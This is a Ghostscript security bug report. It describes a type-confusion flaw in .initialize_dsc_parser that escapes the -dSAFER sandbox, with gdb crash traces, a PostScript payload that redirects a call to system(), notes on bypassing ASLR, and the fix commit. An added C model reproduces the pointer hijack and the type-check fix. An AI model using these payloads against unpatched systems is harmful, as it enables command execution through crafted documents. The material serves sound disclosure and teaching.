.initialize_dsc_parser doesn't validate the parameter is a dict type before using it. This is a security issue, because it can be abused to escape the -dSAFER sandbox.

GS>16#4141414141414141 .initialize_dsc_parser

Program received signal SIGSEGV, Segmentation fault.
0x0000000000a65754 in zinitialize_dsc_parser (i_ctx_p=0x1dd0af0) at ./psi/zdscpars.c:154
154         gs_memory_t * const mem = (gs_memory_t *)dict_memory(pdict);
(gdb) x/i $pc
=> 0xa65754 <zinitialize_dsc_parser+43>:        mov    rax,QWORD PTR [rax+0x48]
(gdb) p/x $rax
$3 = 0x4141414141414141

Or trying random other types:

GS>currentdevice .initialize_dsc_parser

Program received signal SIGSEGV, Segmentation fault.
0x0000000000a65775 in zinitialize_dsc_parser (i_ctx_p=0x1dd0af0) at ./psi/zdscpars.c:155
155         dsc_data_t * const data =
(gdb) x/i $pc
=> 0xa65775 <zinitialize_dsc_parser+76>:        call   rax
(gdb) p/x $rax
$10 = 0xc045894cc84d89cc
(gdb) x/x $rax
0xc045894cc84d89cc:     Cannot access memory at address 0xc045894cc84d89cc
This looks pretty simple to exploit; it's possible to bypass ASLR using bug 697169 and reading /proc/self/maps, then you can simply call any routine you want.

(gdb) p system
$1 = {int (const char *)} 0x7ffff6ef4220 <system>
(gdb) r
GPL Ghostscript 9.20 (2016-09-26)
Copyright (C) 2016 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>16#4141414141414141 [16#4141414141414141 16#4141414141414141 16#7ffff6ef4220 16#4141414141414141] .initialize_dsc_parser
sh: -c: line 0: syntax error near unexpected token `)'
sh: -c: line 0: ` hU)iAAAAAAAA|��'
Fixed in commit 875a0095f37626a721c7ff57d606a0f95af03913
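To make the type confusion and the fix concrete, here is an added C model. It is not Ghostscript's code and not from the reporter: a cut-down tagged `ref` union, a `dict` whose `memory` field stands in for what `dict_memory()` returns, a `gs_memory_t` reached through a function pointer (the `call rax` in the second crash), and the operator in its unchecked and checked forms. The struct layouts, error values and names are assumptions chosen so that the value slot of array element 2 overlaps the dict's memory pointer, mirroring the `[... 16#7ffff6ef4220 ...]` operand above; the real 9.20 offsets (the `[rax+0x48]` read) differ, and `system` is replaced by a flag-setting function so the program can run safely.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Error values modelled on Ghostscript's typecheck/VMerror codes (assumption). */
#define GS_OK               0
#define GS_ERROR_TYPECHECK  (-20)
#define GS_ERROR_VMERROR    (-25)

typedef enum { T_INTEGER, T_DICTIONARY, T_ARRAY } ref_type;

/* Allocator handle: the operator reaches its allocator through this pointer. */
typedef struct gs_memory {
    struct { void *(*alloc_struct)(struct gs_memory *mem, size_t size); } procs;
} gs_memory_t;

/* Tagged PostScript object (model). Every variant shares one 8-byte value
 * slot, so an integer's bits can be read back as a pointer if the tag is ignored. */
typedef struct ref {
    uint32_t type;
    uint32_t pad;
    union { int64_t intval; struct dict *pdict; struct ref *refs; } value;
} ref;

/* Model dict; `memory` plays the role of dict_memory(pdict). */
typedef struct dict {
    ref keys;
    ref values;
    int64_t count;
    gs_memory_t *memory;
} dict;

/* In this model dict.memory lands exactly on the value slot of array element 2. */
_Static_assert(offsetof(dict, memory) == 2 * sizeof(ref) + offsetof(ref, value),
               "dict.memory must overlap array element 2 (model assumption)");

static void *benign_alloc_struct(gs_memory_t *mem, size_t size)
{
    (void)mem;
    return calloc(1, size);
}

/* Stand-in for system(): records the hijacked call instead of spawning a shell. */
int hijacked;
static void *evil_alloc_struct(gs_memory_t *mem, size_t size)
{
    (void)mem; (void)size;
    hijacked = 1;
    return NULL;
}

/* Pre-fix shape: the operand is treated as a dict without a type check.
 * noinline keeps the compiler from reasoning across the type pun. */
static __attribute__((noinline)) int initialize_dsc_parser_vulnerable(ref *op)
{
    dict *const pdict = op->value.pdict;             /* no check_type here */
    gs_memory_t *const mem = pdict->memory;          /* cf. zdscpars.c:154 */
    void *data = mem->procs.alloc_struct(mem, 64);   /* cf. zdscpars.c:155: indirect call */
    if (data == NULL)
        return GS_ERROR_VMERROR;
    free(data);
    return GS_OK;
}

/* Post-fix shape: reject anything that is not a dictionary before using value.pdict. */
static int initialize_dsc_parser_fixed(ref *op)
{
    if (op->type != T_DICTIONARY)
        return GS_ERROR_TYPECHECK;
    return initialize_dsc_parser_vulnerable(op);
}

/* Constructed operand: the array [16#41.. 16#41.. <address> ...] from the report,
 * with the third integer carrying the address of an attacker-shaped gs_memory_t. */
static ref attacker_elems[3];
static gs_memory_t fake_mem = { { evil_alloc_struct } };

static ref make_attacker_array(void)
{
    for (int i = 0; i < 3; i++) {
        attacker_elems[i].type = T_INTEGER;
        attacker_elems[i].value.intval = 0x4141414141414141LL;
    }
    attacker_elems[2].value.intval = (int64_t)(intptr_t)&fake_mem;
    ref op = { .type = T_ARRAY, .pad = 0, .value.refs = attacker_elems };
    return op;
}

int demo_vulnerable_hijack(void)          /* 1 if the attacker's pointer was called */
{
    ref op = make_attacker_array();
    hijacked = 0;
    (void)initialize_dsc_parser_vulnerable(&op);
    return hijacked;
}

int demo_fixed_rejects_array(void)
{
    ref op = make_attacker_array();
    hijacked = 0;
    return initialize_dsc_parser_fixed(&op);
}

int demo_fixed_rejects_integer(void)      /* the bare 16#4141414141414141 case */
{
    ref op = { .type = T_INTEGER, .pad = 0, .value.intval = 0x4141414141414141LL };
    return initialize_dsc_parser_fixed(&op);
}

int demo_fixed_accepts_dict(void)
{
    static gs_memory_t real_mem = { { benign_alloc_struct } };
    static dict d;
    d.memory = &real_mem;
    ref op = { .type = T_DICTIONARY, .pad = 0, .value.pdict = &d };
    return initialize_dsc_parser_fixed(&op);
}

int main(void)
{
    printf("unchecked operator hijacked: %d\n", demo_vulnerable_hijack());
    printf("fixed operator on array: %d\n", demo_fixed_rejects_array());
    printf("fixed operator on integer: %d\n", demo_fixed_rejects_integer());
    printf("fixed operator on dict: %d\n", demo_fixed_accepts_dict());
    return 0;
}
```

The point of the model is the shape of the bug rather than the exact offsets: once an operator dereferences `value.pdict` without a tag check, any PostScript object whose value slot (or whose pointed-to storage) the caller controls can steer the later indirect call, and the one-line `check_type`-style guard is what closes it.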